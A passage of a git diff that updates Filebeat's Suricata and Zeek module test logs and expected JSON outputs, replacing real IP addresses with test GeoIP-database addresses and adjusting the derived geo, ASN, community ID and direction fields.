-        "source.geo.location.lat": 47.6348,
-        "source.geo.location.lon": -122.3451,
-        "source.geo.region_iso_code": "US-WA",
-        "source.geo.region_name": "Washington",
-        "source.ip": "52.222.141.99",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.mac": "00:03:2d:3f:e5:63",
         "source.packets": 6,
         "source.port": 80,
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json
index 312ed45c58bb..131a0efe25b7 100644
--- a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json
@@ -424,14 +424,7 @@
     {
         "@timestamp": "2018-07-05T19:51:50.666Z",
         "destination.address": "17.142.164.13",
-        "destination.as.number": 714,
-        "destination.as.organization.name": "Apple Inc.",
         "destination.domain": "p33-btmmdns.icloud.com",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "17.142.164.13",
         "destination.port": 443,
         "event.category": [
diff --git a/x-pack/filebeat/module/zeek/connection/test/connection-json.log b/x-pack/filebeat/module/zeek/connection/test/connection-json.log
index 467f28552c17..1e16feb89d4e 100644
--- a/x-pack/filebeat/module/zeek/connection/test/connection-json.log
+++ b/x-pack/filebeat/module/zeek/connection/test/connection-json.log
@@ -1,5 +1,5 @@
 {"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"4.4.2.2","id.orig_p":38341,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"175.16.199.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"67.43.156.14","id.orig_p":38341,"id.resp_h":"175.16.199.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
 {"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.0.2.205","id.orig_p":3,"id.resp_h":"198.51.100.249","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]}
 {"ts":"2021-06-09T20:55:13.160328Z","uid":"C2KP1V3alRLoxl4JB9","id.orig_h":"10.0.2.15","id.orig_p":46408,"id.resp_h":"172.217.9.68","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
diff --git a/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json b/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json
index 611d4b41bdac..93a99b2cf564 100644
--- a/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json
@@ -53,16 +53,17 @@
     },
     {
         "@timestamp": "2019-01-11T06:33:36.857Z",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 206,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "event.category": [
@@ -82,14 +83,14 @@
         "input.type": "log",
         "log.offset": 398,
         "network.bytes": 309,
-        "network.community_id": "1:77KJyeznYjdDxCSKdZhW89aAaBI=",
+        "network.community_id": "1:u1VgTKo24ESvDqcvQvAIIngeo3c=",
         "network.direction": "outbound",
         "network.packets": 2,
         "network.protocol": "dns",
         "network.transport": "udp",
         "related.ip": [
-            "192.168.86.167",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.86.167"
         ],
         "service.type": "zeek",
         "source.address": "192.168.86.167",
@@ -111,16 +112,17 @@
     },
     {
         "@timestamp": "2019-01-11T06:33:37.857Z",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 206,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "event.category": [
@@ -138,28 +140,27 @@
         ],
         "fileset.name": "connection",
         "input.type": "log",
-        "log.offset": 792,
+        "log.offset": 797,
         "network.bytes": 309,
-        "network.community_id": "1:7pTO7SRt6R5Ms7DZet2wPuZnXSs=",
+        "network.community_id": "1:YqjkxL01hUV/S2OJjwnMWOg/eO8=",
         "network.direction": "external",
         "network.packets": 2,
         "network.protocol": "dns",
         "network.transport": "udp",
         "related.ip": [
-            "4.4.2.2",
-            "8.8.8.8"
+            "175.16.199.1",
+            "67.43.156.14"
         ],
         "service.type": "zeek",
-        "source.address": "4.4.2.2",
-        "source.as.number": 3356,
-        "source.as.organization.name": "Level 3 Parent, LLC",
+        "source.address": "67.43.156.14",
+        "source.as.number": 35908,
         "source.bytes": 103,
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "4.4.2.2",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.packets": 1,
         "source.port": 38341,
         "tags": [
@@ -192,7 +193,7 @@
         ],
         "fileset.name": "connection",
         "input.type": "log",
-        "log.offset": 1180,
+        "log.offset": 1195,
         "network.bytes": 107,
         "network.community_id": "1:gzTID87+KHoT4RFDSqb5aInTPeg=",
         "network.direction": "external",
@@ -222,14 +223,7 @@
     {
         "@timestamp": "2021-06-09T20:55:13.160Z",
         "destination.address": "172.217.9.68",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.9.68",
         "destination.packets": 0,
         "destination.port": 80,
@@ -246,7 +240,7 @@
         ],
         "fileset.name": "connection",
         "input.type": "log",
-        "log.offset": 1488,
+        "log.offset": 1503,
         "network.bytes": 0,
         "network.community_id": "1:DzqI9CYXjMSYV8VoSAHtMNfMIeU=",
         "network.direction": "outbound",
diff --git a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log
index d2110bf9fb9c..d3368f88e677 100644
--- a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log
+++ b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log
@@ -1 +1 @@
-{"ts":1507567500.423033,"uid":"CRrT7S1ccw9H6hzCR","id.orig_h":"192.168.10.31","id.orig_p":49285,"id.resp_h":"192.168.10.10","id.resp_p":445,"proto":"tcp","analyzer":"DCE_RPC","failure_reason":"Binpac exception: binpac exception: \u0026enforce violation : DCE_RPC_Header:rpc_vers"}
+{"ts":1507567500.423033,"uid":"CRrT7S1ccw9H6hzCR","id.orig_h":"192.168.10.31","id.orig_p":49285,"id.resp_h":"175.16.199.1","id.resp_p":445,"proto":"tcp","analyzer":"DCE_RPC","failure_reason":"Binpac exception: binpac exception: \u0026enforce violation : DCE_RPC_Header:rpc_vers"}
diff --git a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json
index 10e0ed1b7fc8..f608a589d564 100644
--- a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json
@@ -1,8 +1,16 @@
 [
     {
         "@timestamp": "2017-10-09T16:45:00.423Z",
-        "destination.address": "192.168.10.10",
-        "destination.ip": "192.168.10.10",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 445,
         "event.category": [
             "network"
@@ -18,11 +26,11 @@
         "fileset.name": "dpd",
         "input.type": "log",
         "log.offset": 0,
-        "network.community_id": "1:b+Szw+ia464igf5e+MwW1WUzw9Y=",
-        "network.direction": "internal",
+        "network.community_id": "1:XUkl5nEW5zNKuQdXxIXv4T7Jtxg=",
+        "network.direction": "outbound",
         "network.transport": "tcp",
         "related.ip": [
-            "192.168.10.10",
+            "175.16.199.1",
             "192.168.10.31"
         ],
         "service.type": "zeek",
diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json
index c5e64d5aee88..d2053c24a00e 100644
--- a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json
@@ -2,16 +2,6 @@
     {
         "@timestamp": "2019-01-17T01:05:30.172Z",
         "destination.address": "17.253.5.203",
-        "destination.as.number": 6185,
-        "destination.as.organization.name": "Apple Inc.",
-        "destination.geo.city_name": "San Jose",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.3388,
-        "destination.geo.location.lon": -121.8914,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "17.253.5.203",
         "destination.port": 80,
         "event.action": "get",
@@ -77,16 +67,6 @@
     {
         "@timestamp": "2019-01-17T06:36:59.757Z",
         "destination.address": "34.206.130.40",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "34.206.130.40",
         "destination.port": 80,
         "event.action": "get",
diff --git a/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json b/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json
index c22918b6f781..0cc1453d4420 100644
--- a/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json
@@ -2,13 +2,6 @@
     {
         "@timestamp": "2019-11-06T09:03:00.989Z",
         "destination.address": "198.41.0.4",
-        "destination.as.number": 20172,
-        "destination.as.organization.name": "VeriSign Global Registry Services",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "198.41.0.4",
         "destination.port": 53,
         "event.dataset": "zeek.intel",
diff --git a/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json b/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json
index 0d4aa51901f4..21f14351636d 100644
--- a/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json
@@ -2,13 +2,8 @@
     {
         "@timestamp": "2013-12-20T15:44:10.647Z",
         "destination.address": "38.229.70.20",
-        "destination.as.number": 23028,
-        "destination.as.organization.name": "Team Cymru Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "destination.as.number": 174,
+        "destination.as.organization.name": "Cogent Communications",
         "destination.ip": "38.229.70.20",
         "destination.port": 8000,
         "event.action": "USER",
@@ -50,13 +45,8 @@
     {
         "@timestamp": "2013-12-20T15:44:10.647Z",
         "destination.address": "38.229.70.20",
-        "destination.as.number": 23028,
-        "destination.as.organization.name": "Team Cymru Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "destination.as.number": 174,
+        "destination.as.organization.name": "Cogent Communications",
         "destination.ip": "38.229.70.20",
         "destination.port": 8000,
         "event.action": "NICK",
@@ -103,13 +93,8 @@
     {
         "@timestamp": "2013-12-20T15:44:10.706Z",
         "destination.address": "38.229.70.20",
-        "destination.as.number": 23028,
-        "destination.as.organization.name": "Team Cymru Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "destination.as.number": 174,
+        "destination.as.organization.name": "Cogent Communications",
         "destination.ip": "38.229.70.20",
         "destination.port": 8000,
         "event.action": "JOIN",
diff --git a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log
index bb5b2c52004d..3697678f4c5a 100644
--- a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log
+++ b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log
@@ -1 +1 @@
-{"ts":1507565599.590346,"uid":"C56Flhb4WQBNkfMOl","id.orig_h":"192.168.10.31","id.orig_p":49242,"id.resp_h":"192.168.10.10","id.resp_p":88,"request_type":"TGS","client":"RonHD/CONTOSO.LOCAL","service":"HOST/admin-pc","success":true,"till":2136422885.0,"cipher":"aes256-cts-hmac-sha1-96","forwardable":true,"renewable":true,"cert.client_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","cert.server_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US"}
+{"ts":1507565599.590346,"uid":"C56Flhb4WQBNkfMOl","id.orig_h":"192.168.10.31","id.orig_p":49242,"id.resp_h":"175.16.199.1","id.resp_p":88,"request_type":"TGS","client":"RonHD/CONTOSO.LOCAL","service":"HOST/admin-pc","success":true,"till":2136422885.0,"cipher":"aes256-cts-hmac-sha1-96","forwardable":true,"renewable":true,"cert.client_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","cert.server_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US"}
diff --git a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json
index 38bafd606410..66a18b8af3fe 100644
--- a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json
@@ -2,8 +2,16 @@
     {
         "@timestamp": "2017-10-09T16:13:19.590Z",
         "client.address": "192.168.10.31",
-        "destination.address": "192.168.10.10",
-        "destination.ip": "192.168.10.10",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 88,
         "event.action": "TGS",
         "event.category": [
@@ -22,18 +30,18 @@
         "fileset.name": "kerberos",
         "input.type": "log",
         "log.offset": 0,
-        "network.community_id": "1:DW/lSsosl8gZ8pqO9kKMm7cZheQ=",
-        "network.direction": "internal",
+        "network.community_id": "1:b3Wq/ZUliRnevvni5Ppqi3dfzfE=",
+        "network.direction": "outbound",
         "network.protocol": "kerberos",
         "network.transport": "tcp",
         "related.ip": [
-            "192.168.10.10",
+            "175.16.199.1",
             "192.168.10.31"
         ],
         "related.user": [
             "RonHD"
         ],
-        "server.address": "192.168.10.10",
+        "server.address": "175.16.199.1",
         "service.type": "zeek",
         "source.address": "192.168.10.31",
         "source.ip": "192.168.10.31",
diff --git a/x-pack/filebeat/module/zeek/notice/test/notice-json.log b/x-pack/filebeat/module/zeek/notice/test/notice-json.log
index bac408ed58f4..06447e2e7a3c 100644
--- a/x-pack/filebeat/module/zeek/notice/test/notice-json.log
+++ b/x-pack/filebeat/module/zeek/notice/test/notice-json.log
@@ -1,2 +1,2 @@
 {"ts":1320435875.879278,"note":"SSH::Password_Guessing","msg":"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).","sub":"Sampled servers:  172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136","src":"172.16.238.1","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
-{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"8.42.77.171","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
+{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"216.160.83.57 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"216.160.83.57","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
diff --git a/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json b/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json
index 7d804ac76db9..dcaa7b617331 100644
--- a/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json
@@ -35,16 +35,6 @@
     {
         "@timestamp": "2019-02-28T22:36:28.426Z",
         "destination.address": "207.154.238.205",
-        "destination.as.number": 14061,
-        "destination.as.organization.name": "DigitalOcean, LLC",
-        "destination.geo.city_name": "Frankfurt am Main",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 50.1188,
-        "destination.geo.location.lon": 8.6843,
-        "destination.geo.region_iso_code": "DE-HE",
-        "destination.geo.region_name": "Hesse",
         "destination.ip": "207.154.238.205",
         "event.category": [
             "intrusion_detection"
@@ -62,28 +52,27 @@
         "network.direction": "external",
         "related.ip": [
             "207.154.238.205",
-            "8.42.77.171"
+            "216.160.83.57"
         ],
-        "rule.description": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s",
+        "rule.description": "216.160.83.57 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s",
         "rule.name": "Scan::Port_Scan",
         "service.type": "zeek",
-        "source.address": "8.42.77.171",
-        "source.as.number": 393552,
-        "source.as.organization.name": "Longmont Power & Communications",
-        "source.geo.city_name": "Longmont",
+        "source.address": "216.160.83.57",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.1559,
-        "source.geo.location.lon": -105.1624,
-        "source.geo.region_iso_code": "US-CO",
-        "source.geo.region_name": "Colorado",
-        "source.ip": "8.42.77.171",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "zeek.notice"
         ],
         "zeek.notice.dropped": false,
-        "zeek.notice.msg": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s",
+        "zeek.notice.msg": "216.160.83.57 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s",
         "zeek.notice.note": "Scan::Port_Scan",
         "zeek.notice.peer_descr": "bro",
         "zeek.notice.sub": "remote",
diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log
index 9799c888dba7..5d6e00f08394 100644
--- a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log
+++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log
@@ -1,2 +1,2 @@
-{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
-{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
+{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"67.43.156.12","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
+{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"67.43.156.12","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
index 7c7b34cbefac..2ac60a5843d5 100644
--- a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
@@ -2,13 +2,6 @@
     {
         "@timestamp": "2020-10-08T00:29:07.977Z",
         "destination.address": "208.79.89.249",
-        "destination.as.number": 25795,
-        "destination.as.organization.name": "ARP NETWORKS, INC.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.79.89.249",
         "destination.port": 123,
         "event.category": [
@@ -17,7 +10,7 @@
         "event.dataset": "zeek.ntp",
         "event.kind": "event",
         "event.module": "zeek",
-        "event.original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}",
+        "event.original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"67.43.156.12\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}",
         "event.type": [
             "connection",
             "info",
@@ -26,23 +19,24 @@
         "fileset.name": "ntp",
         "input.type": "log",
         "log.offset": 0,
-        "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=",
+        "network.community_id": "1:muwkrDW4UPGLQ9iNHdBLBx3RwS8=",
         "network.direction": "external",
         "network.protocol": "ntp",
         "network.transport": "udp",
         "network.type": "ipv4",
         "related.ip": [
-            "130.118.205.62",
-            "208.79.89.249"
+            "208.79.89.249",
+            "67.43.156.12"
         ],
         "service.type": "zeek",
-        "source.address": "130.118.205.62",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "130.118.205.62",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 38461,
         "tags": [
             "zeek.ntp"
@@ -65,13 +59,6 @@
     {
         "@timestamp": "2020-10-08T00:29:08.081Z",
         "destination.address": "208.79.89.249",
-        "destination.as.number": 25795,
-        "destination.as.organization.name": "ARP NETWORKS, INC.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.79.89.249",
         "destination.port": 123,
         "event.category": [
@@ -80,7 +67,7 @@
         "event.dataset": "zeek.ntp",
         "event.kind": "event",
         "event.module": "zeek",
